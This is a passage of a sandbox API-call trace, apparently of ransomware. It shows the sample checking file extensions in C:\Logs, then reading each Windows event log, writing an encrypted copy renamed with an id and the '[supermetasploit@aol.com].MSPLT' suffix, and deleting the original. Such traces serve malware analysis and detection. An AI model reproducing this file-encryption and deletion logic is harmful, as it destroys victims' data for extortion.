(lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0290.331] lstrlenW (lpString=".zip") returned 4 [0290.331] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0290.331] lstrlenW (lpString=".rar") returned 4 [0290.331] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0290.331] lstrlenW (lpString=".bz2") returned 4 [0290.331] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0290.331] lstrlenW (lpString=".7z") returned 3 [0290.331] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0290.331] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0290.331] lstrlenW (lpString=".dbf") returned 4 [0290.331] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0290.331] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0290.331] lstrlenW (lpString=".1cd") returned 4 [0290.331] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0290.331] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0290.331] lstrlenW (lpString=".jpg") returned 4 [0290.331] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0290.332] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0290.332] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0290.332] lstrlenW (lpString=".doc") returned 4 [0290.332] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0290.332] lstrlenW (lpString=".docx") returned 5 [0290.332] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0290.332] lstrlenW (lpString=".pdf") returned 4 [0290.332] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0290.332] lstrlenW (lpString=".xls") returned 4 [0290.332] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0290.332] lstrlenW (lpString=".xlsx") returned 5 [0290.332] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0290.332] lstrlenW (lpString=".ppt") returned 4 [0290.332] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0290.332] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0290.332] lstrlenW (lpString=".zip") returned 4 [0290.332] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0290.332] lstrlenW (lpString=".rar") returned 4 [0290.332] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0290.332] lstrlenW (lpString=".bz2") returned 4 [0290.332] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0290.332] lstrlenW (lpString=".7z") returned 3 [0290.332] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0290.332] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0290.332] lstrlenW (lpString=".dbf") returned 4 [0290.332] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0290.332] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0290.332] lstrlenW (lpString=".1cd") returned 4 [0290.332] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0290.332] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned 57 [0290.333] lstrlenW (lpString=".jpg") returned 4 [0290.333] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0290.333] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0290.333] lstrlenW (lpString="Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 47 [0290.334] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0290.336] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0290.336] CloseHandle (hObject=0x3b0) returned 1 [0290.338] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx")) returned 0x20 [0290.338] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0290.338] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0290.338] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.338] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.338] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0290.339] GetLastError () returned 0x0 [0290.339] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0290.344] WriteFile (in: hFile=0x454, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0290.346] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0290.346] WriteFile (in: hFile=0x454, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x132, lpOverlapped=0x0) returned 1 [0290.346] SetEndOfFile (hFile=0x454) returned 1 [0290.346] CloseHandle (hObject=0x454) returned 1 [0290.352] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.352] SetEndOfFile (hFile=0x3b0) returned 1 [0290.354] CloseHandle (hObject=0x3b0) returned 1 [0290.354] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0290.354] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-grouppolicy%4operational.evtx")) returned 1 [0290.354] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0290.354] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0290.354] lstrlenW (lpString=".doc") returned 4 [0290.355] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0290.355] lstrlenW (lpString=".docx") returned 5 [0290.355] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0290.355] lstrlenW (lpString=".pdf") returned 4 [0290.355] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0290.355] lstrlenW (lpString=".xls") returned 4 [0290.355] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0290.355] lstrlenW (lpString=".xlsx") returned 5 [0290.355] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0290.355] lstrlenW (lpString=".ppt") returned 4 [0290.355] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0290.355] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0290.355] lstrlenW (lpString=".zip") returned 4 [0290.355] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0290.355] lstrlenW (lpString=".rar") returned 4 [0290.355] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0290.355] lstrlenW (lpString=".bz2") returned 4 [0290.355] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0290.355] lstrlenW (lpString=".7z") returned 3 [0290.355] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0290.355] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0290.355] lstrlenW (lpString=".dbf") returned 4 [0290.355] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0290.355] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0290.355] lstrlenW (lpString=".1cd") returned 4 [0290.355] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0290.355] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0290.355] lstrlenW (lpString=".jpg") returned 4 [0290.355] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0290.355] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0290.355] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0290.355] lstrlenW (lpString=".doc") returned 4 [0290.356] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0290.356] lstrlenW (lpString=".docx") returned 5 [0290.356] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0290.356] lstrlenW (lpString=".pdf") returned 4 [0290.356] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0290.356] lstrlenW (lpString=".xls") returned 4 [0290.356] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0290.356] lstrlenW (lpString=".xlsx") returned 5 [0290.356] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0290.356] lstrlenW (lpString=".ppt") returned 4 [0290.356] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0290.356] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0290.356] lstrlenW (lpString=".zip") returned 4 [0290.356] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0290.356] lstrlenW (lpString=".rar") returned 4 [0290.356] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0290.356] lstrlenW (lpString=".bz2") returned 4 [0290.356] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0290.356] lstrlenW (lpString=".7z") returned 3 [0290.356] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0290.356] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0290.356] lstrlenW (lpString=".dbf") returned 4 [0290.356] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0290.356] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0290.356] lstrlenW (lpString=".1cd") returned 4 [0290.356] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0290.356] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned 55 [0290.356] lstrlenW (lpString=".jpg") returned 4 [0290.356] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0290.356] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0290.357] lstrlenW (lpString="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 51 [0290.357] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0290.357] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0290.357] CloseHandle (hObject=0x3b0) returned 1 [0290.357] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx")) returned 0x20 [0290.357] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0290.357] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0290.357] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.357] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.358] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0290.928] GetLastError () returned 0x0 [0290.928] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0290.937] WriteFile (in: hFile=0x450, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0290.940] ReadFile (in: hFile=0x3b0, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0290.940] WriteFile (in: hFile=0x450, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x13a, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x13a, lpOverlapped=0x0) returned 1 [0290.941] SetEndOfFile (hFile=0x450) returned 1 [0290.941] CloseHandle (hObject=0x450) returned 1 [0290.944] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0290.945] SetEndOfFile (hFile=0x3b0) returned 1 [0290.946] CloseHandle (hObject=0x3b0) returned 1 [0290.946] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0290.947] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx")) returned 1 [0290.961] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0290.961] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0290.961] lstrlenW (lpString=".doc") returned 4 [0290.961] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0290.961] lstrlenW (lpString=".docx") returned 5 [0290.961] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0290.961] lstrlenW (lpString=".pdf") returned 4 [0290.961] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0290.961] lstrlenW (lpString=".xls") returned 4 [0290.961] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0290.961] lstrlenW (lpString=".xlsx") returned 5 [0290.961] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0290.961] lstrlenW (lpString=".ppt") returned 4 [0290.961] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0290.961] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0290.961] lstrlenW (lpString=".zip") returned 4 [0290.961] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0290.961] lstrlenW (lpString=".rar") returned 4 [0290.961] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0290.961] lstrlenW (lpString=".bz2") returned 4 [0290.961] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0290.961] lstrlenW (lpString=".7z") returned 3 [0290.962] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0290.962] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0290.962] lstrlenW (lpString=".dbf") returned 4 [0290.962] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0290.962] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0290.962] lstrlenW (lpString=".1cd") returned 4 [0290.962] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0290.962] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0290.962] lstrlenW (lpString=".jpg") returned 4 [0290.962] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0290.962] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0290.962] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0290.962] lstrlenW (lpString=".doc") returned 4 [0290.962] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0290.962] lstrlenW (lpString=".docx") returned 5 [0290.962] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0290.962] lstrlenW (lpString=".pdf") returned 4 [0290.962] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0290.962] lstrlenW (lpString=".xls") returned 4 [0290.962] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0290.962] lstrlenW (lpString=".xlsx") returned 5 [0290.962] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0290.962] lstrlenW (lpString=".ppt") returned 4 [0290.963] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0290.963] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0290.963] lstrlenW (lpString=".zip") returned 4 [0290.963] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0290.963] lstrlenW (lpString=".rar") returned 4 [0290.963] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0290.963] lstrlenW (lpString=".bz2") returned 4 [0290.963] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0290.963] lstrlenW (lpString=".7z") returned 3 [0290.963] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0290.963] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0290.963] lstrlenW (lpString=".dbf") returned 4 [0290.963] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0290.963] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0290.963] lstrlenW (lpString=".1cd") returned 4 [0290.963] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0290.963] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 59 [0290.963] lstrlenW (lpString=".jpg") returned 4 [0290.963] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0290.963] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0290.964] lstrlenW (lpString="Microsoft-Windows-International%4Operational.evtx") returned 49 [0290.964] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0291.326] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=69632) returned 1 [0291.327] CloseHandle (hObject=0x450) returned 1 [0291.327] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx")) returned 0x20 [0291.327] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0291.327] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0291.327] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.328] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.328] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0291.332] GetLastError () returned 0x0 [0291.332] ReadFile (in: hFile=0x450, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x11000, lpOverlapped=0x0) returned 1 [0291.355] WriteFile (in: hFile=0x440, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x11010, lpOverlapped=0x0) returned 1 [0291.359] ReadFile (in: hFile=0x450, lpBuffer=0x3ca8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x335fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesRead=0x335fecc*=0x0, lpOverlapped=0x0) returned 1 [0291.359] WriteFile (in: hFile=0x440, lpBuffer=0x3ca8020*, nNumberOfBytesToWrite=0x136, lpNumberOfBytesWritten=0x335fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ca8020*, lpNumberOfBytesWritten=0x335fc94*=0x136, lpOverlapped=0x0) returned 1 [0291.359] SetEndOfFile (hFile=0x440) returned 1 [0291.439] CloseHandle (hObject=0x440) returned 1 [0291.442] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x335fec0 | out: lpNewFilePointer=0x0) returned 1 [0291.442] SetEndOfFile (hFile=0x450) returned 1 [0291.444] CloseHandle (hObject=0x450) returned 1 [0291.444] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0291.444] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx")) returned 1 [0291.445] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0291.445] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0291.445] lstrlenW (lpString=".doc") returned 4 [0291.445] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.445] lstrlenW (lpString=".docx") returned 5 [0291.445] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0291.445] lstrlenW (lpString=".pdf") returned 4 [0291.445] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0291.445] lstrlenW (lpString=".xls") returned 4 [0291.445] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0291.445] lstrlenW (lpString=".xlsx") returned 5 [0291.445] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0291.445] lstrlenW (lpString=".ppt") returned 4 [0291.445] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0291.445] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0291.445] lstrlenW (lpString=".zip") returned 4 [0291.445] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0291.445] lstrlenW (lpString=".rar") returned 4 [0291.446] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0291.446] lstrlenW (lpString=".bz2") returned 4 [0291.446] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0291.446] lstrlenW (lpString=".7z") returned 3 [0291.446] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0291.446] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0291.446] lstrlenW (lpString=".dbf") returned 4 [0291.446] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0291.446] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0291.446] lstrlenW (lpString=".1cd") returned 4 [0291.446] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0291.446] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0291.446] lstrlenW (lpString=".jpg") returned 4 [0291.446] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0291.446] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0291.446] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 57 [0291.446] lstrlenW (lpString=".doc") returned 4 [0291.446] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0291.446] lstrlenW (lpString=".docx") returned 5 [0291.446] lstrcmpiW (lpString1=".docx", 